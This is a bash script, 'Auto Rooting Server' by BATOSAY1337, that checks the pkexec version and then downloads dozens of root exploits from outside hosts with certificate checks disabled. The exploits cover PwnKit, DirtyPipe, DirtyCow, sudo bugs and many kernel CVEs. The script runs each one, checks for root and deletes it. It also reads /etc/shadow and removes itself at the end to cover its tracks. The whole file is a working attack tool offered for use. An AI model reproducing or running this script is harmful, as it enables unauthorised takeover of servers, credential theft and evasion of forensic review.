#!/bin/bash RED='\033[91m' ENDCOLOR='\033[0m' echo "***************************************************************" echo -e "${RED}Auto Rooting Server By: BATOSAY1337${ENDCOLOR}" echo -e "${RED}GROUP : 688${ENDCOLOR}" echo "***************************************************************" check_root() { if [ "$(id -u)" -eq 0 ]; then echo echo "Successfully Get Root Access" echo "ID => $(id -u)" echo "WHOAMI => $USER" echo exit fi } check_pkexec_version() { output=$(pkexec --version) version="" while IFS= read -r line; do if [[ $line == *"pkexec version"* ]]; then version=$(echo "$line" | awk '{print $NF}') break fi done <<< "$output" echo "$version" } run_commands_with_pkexec() { pkexec_version=$(check_pkexec_version) echo "pkexec version: $pkexec_version" if [[ $pkexec_version == "1.05" || $pkexec_version == "0.96" || $pkexec_version == "0.95" || $pkexec_version == "105" ]]; then wget -q "https://0-gram.github.io/id-0/exp_file_credential" --no-check-certificate chmod 777 exp_file_credential ./exp_file_credential check_root rm -f exp_file_credential rm -rf exp_dir else echo "pkexec not supported" fi } run_commands_with_pkexec # pwnki / pkexec wget -q "https://0-gram.github.io/id-0/ak" --no-check-certificate chmod 777 ak ./ak check_root rm -f ak rm -rf GCONV_PATH=. rm -rf .pkexec # ptrace wget -q "https://0-gram.github.io/id-0/ptrace" --no-check-certificate chmod 777 ptrace ./ptrace check_root rm -f ptrace # CVE-2022-0847-DirtyPipe-Exploits wget -q "https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/exploit-1" --no-check-certificate wget -q "https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/exploit-2" --no-check-certificate chmod 777 exploit-1 chmod 777 exploit-2 ./exploit-1 ./exploit-2 SUID check_root rm -f exploit-1 rm -f exploit-2 # lupa:v wget -q "https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/a2.out" --no-check-certificate chmod 777 a2.out find / -perm 4000 -type -f 2>/dev/null || find / -perm -u=s -type -f 2>/dev/null ./a2.out /usr/bin/sudo check_root ./a2.out /usr/bin/passwd check_root rm -f a2.out wget -q "https://0-gram.github.io/id-0/sudodirtypipe" --no-check-certificate chmod 777 "sudodirtypipe" ./sudodirtypipe /usr/local/bin check_root rm "sudodirtypipe" wget -q "https://0-gram.github.io/id-0/af_packet" --no-check-certificate chmod 777 "af_packet" ./af_packet check_root rm "af_packet" wget -q "https://0-gram.github.io/id-0/CVE-2015-1328" --no-check-certificate chmod 777 "CVE-2015-1328" ./CVE-2015-1328 check_root rm "CVE-2015-1328" wget -q "https://0-gram.github.io/id-0/cve-2017-16995" --no-check-certificate chmod 777 "cve-2017-16995" ./cve-2017-16995 check_root rm "cve-2017-16995" wget -q "https://0-gram.github.io/id-0/exploit-debian" --no-check-certificate chmod 777 "exploit-debian" ./exploit-debian check_root rm "exploit-debian" wget -q "https://0-gram.github.io/id-0/exploit-ubuntu" --no-check-certificate chmod 777 "exploit-ubuntu" ./exploit-ubuntu check_root rm "exploit-ubuntu" wget -q "https://0-gram.github.io/id-0/newpid" --no-check-certificate chmod 777 "newpid" ./newpid check_root rm "newpid" wget -q "https://0-gram.github.io/id-0/raceabrt" --no-check-certificate chmod 777 "raceabrt" ./raceabrt check_root rm "raceabrt" wget -q "https://0-gram.github.io/id-0/timeoutpwn" --no-check-certificate chmod 777 "timeoutpwn" ./timeoutpwn check_root rm "timeoutpwn" wget -q "https://0-gram.github.io/id-0/upstream44" --no-check-certificate chmod 777 "upstream44" ./upstream44 check_root rm "upstream44" wget -q "https://0-gram.github.io/id-0/lpe.sh" --no-check-certificate chmod 777 "lpe.sh" head -2 /etc/shadow ./lpe.sh check_root rm "lpe.sh" wget -q "https://0-gram.github.io/id-0/a.out" --no-check-certificate chmod 777 "a.out" ./a.out 0 && ./a.out 1 check_root rm "a.out" wget -q "https://0-gram.github.io/id-0/linux_sudo_cve-2017-1000367" --no-check-certificate chmod 777 "linux_sudo_cve-2017-1000367" ./linux_sudo_cve-2017-1000367 check_root rm "linux_sudo_cve-2017-1000367" wget -q "https://0-gram.github.io/id-0/overlayfs" --no-check-certificate chmod 777 "overlayfs" ./overlayfs check_root rm "overlayfs" wget -q "https://0-gram.github.io/id-0/CVE-2017-7308" --no-check-certificate chmod 777 "CVE-2017-7308" ./CVE-2017-7308 check_root rm "CVE-2017-7308" wget -q "https://0-gram.github.io/id-0/CVE-2022-2639" --no-check-certificate chmod 777 "CVE-2022-2639" ./CVE-2022-2639 check_root rm "CVE-2022-2639" wget -q "https://0-gram.github.io/id-0/polkit-pwnage" --no-check-certificate chmod 777 "polkit-pwnage" ./polkit-pwnage check_root rm "polkit-pwnage" wget -q "https://0-gram.github.io/id-0/RationalLove" --no-check-certificate chmod 777 "RationalLove" ./RationalLove check_root rm "RationalLove" wget -q "https://0-gram.github.io/id-0/CVE-2011-1485" --no-check-certificate chmod 777 "CVE-2011-1485" ./CVE-2011-1485 check_root rm "CVE-2011-1485" wget -q "https://0-gram.github.io/id-0/CVE-2012-0056" --no-check-certificate chmod 777 "CVE-2012-0056" ./CVE-2012-0056 check_root rm "CVE-2012-0056" wget -q "https://0-gram.github.io/id-0/CVE-2014-4014" --no-check-certificate chmod 777 "CVE-2014-4014" ./CVE-2014-4014 check_root rm "CVE-2014-4014" wget -q "https://0-gram.github.io/id-0/CVE-2016-9793" --no-check-certificate chmod 777 "CVE-2016-9793" ./CVE-2016-9793 check_root rm "CVE-2016-9793" wget -q "https://0-gram.github.io/id-0/CVE-2021-3493" --no-check-certificate chmod 777 "CVE-2021-3493" ./CVE-2021-3493 check_root rm "CVE-2021-3493" wget -q "https://0-gram.github.io/id-0/CVE-2023-32233" --no-check-certificate chmod 777 "CVE-2023-32233" ./CVE-2023-32233 check_root rm "CVE-2023-32233" wget -q "https://0-gram.github.io/id-0/FreeBSD-2005-EDB-ID-1311" --no-check-certificate chmod 777 "FreeBSD-2005-EDB-ID-1311" ./FreeBSD-2005-EDB-ID-1311 check_root rm "FreeBSD-2005-EDB-ID-1311" wget -q "https://0-gram.github.io/id-0/chocobo_root" --no-check-certificate chmod 777 "chocobo_root" ./chocobo_root check_root rm "chocobo_root" wget -q "https://0-gram.github.io/id-0/cowroot" --no-check-certificate chmod 777 "cowroot" ./cowroot check_root rm "cowroot" wget -q "https://0-gram.github.io/id-0/dcow" --no-check-certificate chmod 777 "dcow" ./dcow check_root rm "dcow" wget -q "https://0-gram.github.io/id-0/dirtycow" --no-check-certificate chmod 777 "dirtycow" ./dirtycow check_root rm "dirtycow" wget -q "https://0-gram.github.io/id-0/exp" --no-check-certificate chmod 777 "exp" ./exp check_root rm "exp" wget -q "https://0-gram.github.io/id-0/makman" --no-check-certificate chmod 777 "makman" ./makman check_root rm "makman" wget -q "https://0-gram.github.io/id-0/pwn" --no-check-certificate chmod 777 "pwn" ./pwn check_root rm "pwn" wget -q "https://0-gram.github.io/id-0/socat" --no-check-certificate chmod 777 "socat" ./socat check_root rm "socat" wget -q "https://0-gram.github.io/id-0/sudo_pwfeedback" --no-check-certificate chmod 777 "sudo_pwfeedback" ./sudo_pwfeedback check_root rm "sudo_pwfeedback" wget -q "https://0-gram.github.io/id-0/exploit_userspec.py" --no-check-certificate chmod 777 "exploit_userspec.py" python2 exploit_userspec.py check_root rm "exploit_userspec.py" rm "0" rm "kmem" rm "sendfile1" wget -q "https://raw.githubusercontent.com/CallMeBatosay/Privilege-Escalation/main/sudo-hax-me-a-sandwich" --no-check-certificate chmod 777 "sudo-hax-me-a-sandwich" ./sudo-hax-me-a-sandwich 0 check_root ./sudo-hax-me-a-sandwich 1 check_root ./sudo-hax-me-a-sandwich 2 check_root rm "sudo-hax-me-a-sandwich" wget -q "https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh" --no-check-certificate chmod 777 "exploit.sh" check_root rm "exploit.sh" echo "TERIMAKASI TELAH MENGGUNAKAN TOOLS KAMI" echo "TOOLS INI AKAN DI HAPUS DARI WEB" echo "AGAR TOOLS SAYA TETAP AMAN TIDAK DI CURI" rm "root.sh"